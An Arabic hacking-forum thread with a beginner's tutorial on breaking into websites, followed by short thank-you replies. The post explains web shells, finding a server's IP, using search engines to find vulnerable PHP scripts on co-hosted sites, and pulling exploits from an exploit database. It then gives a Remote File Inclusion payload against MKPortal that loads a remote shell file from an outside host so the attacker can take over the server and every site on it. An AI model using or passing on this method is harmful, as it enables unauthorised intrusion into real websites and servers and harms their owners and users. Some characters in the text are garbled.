شرح كامل للختراق المواقع واساسياتها مهـم جدا للمبتدئين - منتدى أمن الإسلام | لا اله الا الله محمد رسول الله | IS-SEC.ORG | Dz-SeC Team |

S4wDz · 19/08/2011, 23:14

جبت للمبتدئين الشــي الي راح يتعلمونه وهو مهـم لهـم
وحنا عارفين ان الهكر يتقسم الى عدة أقسام
مبتدئ
خبير
محترف
فأنا بخليك تنقز من مبتدئ إلى محترف لازم تعتمد على الشرح وتطبق وتابع
لازم تعتمدون على انفسسسكم :<< كلمه موجه من ملازم
بسم الله بنزل لكم الشرح
بدايـه لوضع قدمك على الأختراق
ــــــــــــــــــــــــــــــــــــــــــــــــــ ــــــــــــــــــــــــــــــــــــــــــــــــــ ـــــــــــــ
بسم الله

انا لم اعاني في بدايتي لأني وجدت من وقف بجانبي كثيرا
والحمد لله

كنت اسئل اقول وش معنى شل وكيفه ارفعه وش معنى سكريبت وش معنى
ثغره وكيف اعرف اذا فيه ثغره او لا
اسئله كثير عانيت منها لكن بعد ماتعمقت في عالم الهكر وجدت ان كل
المبتدئيين يسئلون مثل اسئلتي هذي واكثرهم متذمر من اختراق المواقع
يقولون لصعوبته بس رأيت انه سهل جداٌٌ جداٌٌ
كثير من المبتدئيين يقولون مافي شروحات في المواقع لمبتدأ مثلي
ياhackawxz مايعرف وش معنى سيرفر وكيفاه يرفع شل
الان ركز
***1633;. ماهو الشل؟
***1634;. ماهي الثغرات؟
***1635;. ماهي خطوات اختراق موقع؟
***1636;. وكيف نرفع الشل؟
***1637;. وكيف نبحث عن سكريبت مصاب؟
***1638;. وعدد كبير من السكريبتات المصابه مع التطبيق عليها
***1639;. وش نسوي بعد مانرفع الشل؟
***1640;. كيف نرفع اندكس الاختراق؟
***1641;. كيف افتح موقع خاص بي؟
ftp ***1633;***1632; . شرح لبرنامج
***1633;***1633; . بعض الحيل لأختراق سيرفر او موقع معين
هذي خطوات راح تتعلم منها تخترق أي موقع يطب براسك
انا قبل لأبدأ
سيرفر/ كمبيوترذو مواصفات قويه من ناحية سرعة المعالج
والأداء وسرعة اتصال عاليه
وهذا هو الي يكون داخله المواقع وكل المواقع بمجلد
home اسمه
يعني لو قدرت ترفع شل على أي موقع بسيرفر راح
تقدر تتحكم بكل المواقع الي على السيرفر
أي خطأ في الملف نعتبره php
سكريبت/ ملف مكتوب بلغة
ثغره ونخترق عن طريقها
الثغره /عباره عن خطأ برمجي في السكريبت
الاستغلال/عباره عن كود يقوم بأستغلال الخطأ البرمجي
(استغلال الثغره)
الفايل انكلود/ نوع من انواع الثغرات وهو من اخطر انواع
الثغرات
وتعتبر الفايل انكلود اسهل ثغره واخطر ثغره

يعني لازم تفهمه وتحفظه ***9676; الي مكتوب بلأحمر مهم جدا
لاتستصعب شئ من البدايه كل شئ سهل بس ركز
واوعدك بعد ماتكمل قرايت هالكتاب تكون فاهم كيف تخترق
وراح تقدر تخترق بعد هالكتاب
راح نبدأ بأول خطوه
انا ماراح اشرح شرح علمي كامل انا راح اكتب الي اشوفه يفيد
المبتدأ وراح ابتعد عن الاسلوب العلمي الي يبعد المبتدأ عن
جو الموضوع ويخليه يستصعب الهكر بصفه عامه
وراح نبدأ بأول خطوه
ماهو الشل؟
(php) الشل عباره عن ملف يتم كتابته بلغة البي اتش بي
ويقوم هذا الملف بتوجيه اوامر لسيرفر لفتح مجلد معين او رفع
اندكس اختراق او أي شئ اخر تريد ان تعمله فبهذا الملف تعمل
أي شئ تريد بسيرفر...
هذا الشل يتم رفعه عن طريق الثغرات الموجوده بسكريبتات
المركبه بالمواقع
هذا اهم شئ لابد انك تعرفه عن الشل وهذا انت عرفته
ننتقل للخطوه الثانيه
ماهي الثغرات؟
الثغرات هي اصعب شئ في الهكر لابد ان تتعمق فيها اكثر
**والثغرات تحتاج الى انسان يتحلى بصبر**
لازم تفهم بلأول نقطتين مهمه جدا
لما تحوس تفتح لك موقع تروح تدور شركة استضافه ·
شركة الاستضافه هذي يكون عندهم شئ اسمه سيرفر ·
السيرفر يكون على كمبيوتر نظامه لينكس مش كيما انظمتنا
ويندوز
نظامهم لينكس وهو اسرع بكثير من الويندز واقوى منه
^_*
كل سيرفر يكون بداخله مواقع
في غلطه كثير من المبتدئين يقع بها وهو لما يبي يرفع شل
<<بعد قليل راح افهمكم على طريقة رفع شل
vb انه لما يبي يرفع شل يروح يدور لثغرات المنتدى
او السكريبتات المركبه على الموقع
وفي الاخير اذا مالقي ثغره يقول يالله مأقدرت اخترق الموقع
لا ياحبيبي *_^
انت لما تحوستخترق موقع تطلع أي بي السيرفر الي عليه الموقع
لأن لاتنسى اني قلت لكم ان كل موقع يكون داخل سيرفر وكل
سيرفر يكون داخله مواقع كثيره
وانت لما ترفع شل على أي موقع موجود بسيرفر راح تتحكم
بسيرفر كله والتحكم بسيرفر كله يعني التحكم بالمواقع الموجوده
بسيرفر
والتحكم كما قلنا بلأول يكون عن طريق الشل
اذا مافهمت العباره الي فوق فقرها اكثر من مره وراح تفهم
بس أهم شئ التركيز *_^
النقطه الثانيه الي حبيت اقلكم عليها ·
ان الثغرات موجوده بشئ اسمه سكريبت
بتسئلني وتقولي يامخاوي وش السكريبت ؟
انا اقلك حبيبي وش السكريبت
(php) السكريبت عباره عن ملف يتم كتابته بلغة البي اتش بي
وكل صاحب موقع مركب سكريبتات بموقعه
بتقلي ليه يامخاوي اصحاب المواقع يركبون سكريبتات وش
الفائده منه؟
انا اقلك
php الحين السكريبت كما قلت عباره عن ملف مكتوب بلغة
يقوم هذا الملف بخدمة اصحاب المواقع ويسهل لهم امور كثيره
مثل المنتدى هو عباره عن سكريبت
وانت تتصفح بعض المواقع تلاقي مكتوب في رئيسية ***9676; احيانا
ٌٌ
الموقع
مركز التحميل
او
ألبوم الصور
او
سجل الزوار
او
مكتبة البرامج
وغيرها غيرها الكثير
وراح اكتب انواع كثيره من السكريبتات المشهوره عشان تقدر
تبحث عنها وترفع شل عن طريقها في هذا الكتاب
الحين راح استعرض لكم بعض صور السكريبتات عشان تفهمها
زين
لأني ماودي اتعدا خطوه الا وانا متأكد انك فاهم كل شئ

لما تظغط على مثلاٌ مكتبة البرامج تلاقي برامج كثيره
هذا سكريبت
انا قلت انه يسهل على اصحاب الموقع
شفتم كيف صاحب الموقع اصلا ماحمل ولا رفع برنامج بس رفع
السكريبت والسكريبت بداخله البرامج *_^
الي يهمنا من الكلام هذا كله ان الثغره توجد داخل السكريبت
كيف لنا نستغلها
عشان نقدر نرفع شل
الثغره عباره عن خطأ برمجي
وحنا لازم نجيب كود استغلال عشان نقدر نستغل هذا الخطا
ونرفع شل
وراح نتطرق لثغرات والاستغلال اكثر بعد اشوي
الثغرات انواع
فايل انكلود
SQL
XSS
وانواع كثيره لكن هذي اهم ثلاثه واشهرها
واخطرها واسهلها الفايل انكلود
وراح يكون شرح كامل عن الفايل انكلود لحد ماتطبق على موقع
من خلال الي راح اكتبه هنا
وهذا شرح كامل لأهم انواع الثغرات
ماهي خطوات اختراق موقع؟وكيف نرفع الشل؟
خطوات اختراق موقع هي الاتي
اول شئ حدد الموقع الي تحوستخترقه
موقع بيت الهكر ***9676; وانا راح اختار مثلا
اول شئ نطلع أي بي السيرفر
وهذا شرح بصور لأستخراج أي بي السيرفر الي مركب عليه
الموقع
اول شئ نظغط على ابدأ بعدين تشغيل ونكتب
الامر
Cmd
ونظغط انتر

بعدين تفتح لنا شاشه سوداء

شوفوا بعد ماكتبنا
Ping http://www.***.com
وظغطنا انتر وش صار

طريقة نسخ الاي بي لتسهيل عليكم
بتكون بالخطوات هذي
اول شئ حط الماوس على الشاشه السوداء الي فيها الاي بي
اظغط الماوس اليمين
بيجيك خيارات اول خيار
الي هو وضع علامه اظغط عليه
بعدين حدد على الاي بي
بعدين

الحين عرفنا نطلع الاي بي وننسخه<<والله الي يسمعه يقول
مخترع صاروخ*_^
المهم نروح نبحث عن السكريبتات المركبه على السيرفر
بتقلي يامخاوي وشلون ابحث عن السكريبتات المركبه في السيرفر
انا اقلك على الطريقه
روح احدا مواقع البحث غير قوقل
وانا افضل
MSN : Hotmail, Messenger, Bing, Actualitأ© et Sport
في خانة البحث نكتب الاي بي بهذي الطريقه
ip:75.126.81.157

ip: اذا كتبتم كذا 75.126.81.157
فراح يطلع لكم كل المواقع الي على السيرفر
واذا تحوستبحث عن سكريبت معين
فتكتب اسم السكريبت بعد الاي بي
مثلا تحوستبحث عن سكريبث
اسمه
MKPortal
فيكون كتابة البحث عن هذا السكريبت بهذي الطريقه
ip:75.126.81.157 MKPortal
وهذي صوره لتوضيح اكثر

والان راح اكتب لكم سكريبتات خطيره لما تحوستخترق موقع
ابحث عنها
***9676; علما
ان كل كلمه راح اكتبها تحت كل ماعليك ان تضعها بعد
رقم أي بي السيرفر
تبحث وماتلاقي يطلع لك شئ هذا معناته ان مافي ***9676; احياناٌ
ٌ
سكريبت مركب على أي موقع بسيرفر بنفس الاسم الي بحثت
عنه
powered by
لأستخراج كامل السكريبتات المركبه على السيرفر
Warning
لأستخراج الأخطأ
Upload
هذا لأستخراج مركز التحميل
ومركز التحميل له طرق كثيره جدا
منها
بالعربي اكتب بعد رقم الاي بي
مركز التحميل
وانا افضل البحث عن السكريبت بأسمه العربي
لأن اكثر اصحاب المواقع يشيل اسم السكريبت من اخر الصفحه
ويكتب جميع الحقوق محفوظه وقتها ماراح يطلع
لهذا اكتب اسمه بالعربي اشوف انه افضل بكثير
MKPortal
لات ***61441; للبحث عن ا
aspjar guestbook
للبحث عن سجل الزوار
او تكتب بالعربي سجل الزوار وراح تجيك
لسجل الزوار ***9676; ايضا
XP Book
وهذا سكريبت خطير
images ***1636;
Images
Glary
Downloads
PhpBB
Powered by : Down Asaher v 2.5
هذي هنا سكريبتات خطيره
بالعربي اكتبوا وانا افضل ***9676; ايضا
أٌلكتابه بالعربي مثل ماقلت
مثل كتابة
بعد الاي بي
سجل الزوار
مكتبة البرامج
مركز التحميل المجله
البوم الصور
وغيرها غيرها الكثير
ابحث وراح تجد اكثر من سكريبت مصاب بكل سيرفر
وكل سكريبت تلاقيه روح ابحث عن ثغراته بطريقتين
الي راح احطه لك الان الاوله مواقع السكيوريتي

والثانيه عن طريق أي موقع بحث والطريقه موجوده تحت بصور
وراح تقدر ترفع شل بأذن الله
مثلا تقول لي hackawxz انا لقيت سكريبت
MKPortal اسمه
من وين اجيب الأستغلال حقه
انا اقلك حبيبي
في مواقع مختصه بثغرات السكريبتات كل يوم ينزلون اكثر من
اربعه ثغرات
طيب انا اعطيك رابط الموقع اول شئ
/http://www.db-exploit.com

فتحت لنا صفحه (search) طيب بعد ماظغطنا على بحث

وبعد كتابة اسم السكريبت المصاب في الفراغ
طلع لنا الثغرات وهذي صوره من الي طلع لنا

Remote File احنا راح نجرب اول ثغره وهي من نوع
Inclusion
***9676; جدا ***9676; لأنه خطيره وسهله جدا
نظغط على اول ثغره
MKPortal NoBoard Module (BETA)
Remote File Inclusion Vulnerability
MKPortal
هذا اسم الثغره

في ناس يقول كيف اعرف الاستغلال
أستغلال ثغرات الفايل انكلود
دائما يجي تحت او بجنب كلمة
Example
او يجي اخره
shell.txt
او[ shell ]?
عرفنا الاستغلال بقى علينا نعرف وش نسوي
قبل لاتعرف بعض المصطلحات المهمه في هذا الاستغلال
http://[ site
]/mkportal/include/user.php?MK_PATH=[ shell ]?
هذي هنا بدلها تحط رابط الموقع >>[site]
مثلا نقول ان الموقع
رابطه كذا
404 Not Found
هذا السكريبت المصاب >>mkportal
mkportal/include/user.php?MK_PATH
هذا الاستغلال حق الثغره
=[ shell ]?
وبدل هذي هنا تحط رابط الشل كامل
ول ماعندي شل او ماعندي موقع عشان ارفع عليه شل ***9676;
وبعد ماحطينا رابط الشل يكون الاستغلال هكذا
404 Not Found
K_PATH=http://www.members.lycos.co.uk/powerhos
ting/ch99.txt?
تحط علامة استفهام مثل ماوضعت انا txt لاتنسى بعد كلمة
\
طيب نفترض ان لقيت ثغرات في المليورم لكن مو منوع فايل
انكلود
فقدامك طريقتين يأما تروح تبحث عن شروح عن طريقة استغلال
نوع ثغره معينه
ويأما تروح قوقل
وراح تلاقي شروح عنها مثل
تروح قوقل وتكتب

الثغرات كثيره بكل سكريبت أنت ابحث وابتعد عن اليئس
لعلك تواجه صعوبه في اول مره تستهدف موقع لكن المره
ومايحتاج له ***9676; الثانيه والثالثه خلاص تحس ان الامر سهل جدا
ٌٌ
شروحات ولا شئ...
واسهل سيرفر راح تقدر ترفع عليه شل هو السيرفر الي مواقعه
كثير والسكريبتات المركبه على المواقع كثيره
وقتها بس ابحث عن أي سكريت سهل واخترق وانا اخوك
^_*
تلاقي سكريبت وتحوستطلع ثغرات جديده انت تروح ***9676; واحيانا
ٌٌ
JAAScoisX- تحمل السكريبت في جهازك ووبرنامج اسمه
يطلع لك الاخطاء الحاصله بسكريبت وانت عليك Code
الاستغلال
انا ماشوف هالطريقه له داعي فهمها بنسبه للمبتدئيين لأنه لو
تعمق فيها وهو لسى مبتدأ راح يحس الهكر صعب
لهذا اتركها بعد فهمك لكل مافي هذا الكتاب وقدرتك على
التطبيق وقتها تعلم باقي العلوم المتطوره
وانا مؤلف هالكتاب على اساس ابتعد عن شئيين الاول طولت
الكلام الي مالها داعي
الثاني ابعاد المبتدأ عن الامور الصعبه والكلام الي يخليه يبطل
يدخل في عالم الهكر
نكمل شرحنا
بعد ماحطيت استغلال ثغرة
Remote File Inclusion
وحطيت رابط الشل خل نشوف الشل بيفتح لنا او لا
اذا فتح معناتها ان الثغره مو مرقعه بسكريبت

تم رفع الشل ولله الحمد
بعض المبتدئين يمر بأشياء منها اول مايحط رابط الشل
والاستغلال يجيه صفحة خطأ او يحوله الرابط للمنتدى او رئيسية
الموقع
وغيرها...الخ...!
هنا راح اقلك ان الثغره مرقعه يعني ماتقدر تخترق عن طريقها
دور سكريبت غيره
طبق mkportal وبنفس الطريقه الي طبقناها على السكريبت
على أي باقي السكريبت
من ناحية البحث عن السكريبت في السيرفر
ومن ناحية البحث عن استغلالها
mkportal وكل شئ طبقه بنفس ماسويت في هذا السكريبت
وارفع شلك وراح تصل للي تبغاه في اقل من مما تتوقع بس
التركيز اهم شئ في الهكر كله *_^
طيب بتقولي hackawxz الحين انا رفعت شل وش اسوي بعدين ان ا
بقلك الان وش تسوي
لهذا بغير هذا الشل r اول شئ انا احب شل 57
r وبحط 57
اول شئ تسويه هو انك تستعرض كل المواقع الي على السيرفر
***9676; وقبل لاتستعرضها ابقلك اشياء مهمه جدا

Th3 WiTch3r-Dz · 06/09/2011, 20:40

******* اخي على الموضوع المميز

S4wDz · 06/09/2011, 23:17

مشكوور حبيب عالمرور

ali(HAKER)31 · 21/04/2012, 19:51

بارك الله فيك لكن الصور لاتظهر يرجى مراجعة الموضوع .

S4wDz · 15/07/2012, 21:44

حبيبي **** هلمرور لكن لاتوجد صور في الموضوع اصلا تحياتي الك

darkooo · 22/09/2013, 18:37

مشكور عالموضوع الأكثر من رائع

Elite_28 · 19/11/2013, 16:46

مشكوووووور

المواضيع المتشابهه
الموضوع	كاتب الموضوع	المنتدى	مشاركات	آخر مشاركة
خاص للمبتدئين تعلم اختراق المواقع والمنتديات ( ادخل ولـن تندم )	Algerino89	[ الـهاكر الـعام \| General Hacking Discussions ]	178	20/09/2015 12:05
اسطوانة مدمرة وفيها كل شروحات اختراق المواقع وخفايا واسرار المواقع الجزء الاول	DR.X	قسم الاسطوانات	37	02/06/2015 23:01
[ من طرق رفع الشيلات . ] رفع شيل على myBB .[ للمبتدئين ]	ViRuS_Ra3cH	[ ارشــيــف الـــــــدورات والـدروس للـمـبـتـدـئـــــــيـن ]	15	16/07/2014 18:29
][دورات صقر غامد للمبتدئين في اختراق المواقع+منتديات+سيرفرات][	WOLF_DZ	[ الدورات العامة ]	9	27/09/2013 09:37
[ برنامج ] : تصميم المواقع Serif Web Plus X5 للمبتدئين و المحترفين	ADMINISTRATOR	[ منتدى البرامج الكاملة والمشروحة ]	0	11/06/2011 21:22

حالياً الأعضاء النشيطين الذين يشاهدون هذا الموضوع : 1 (0 عضو و 1 ضيف)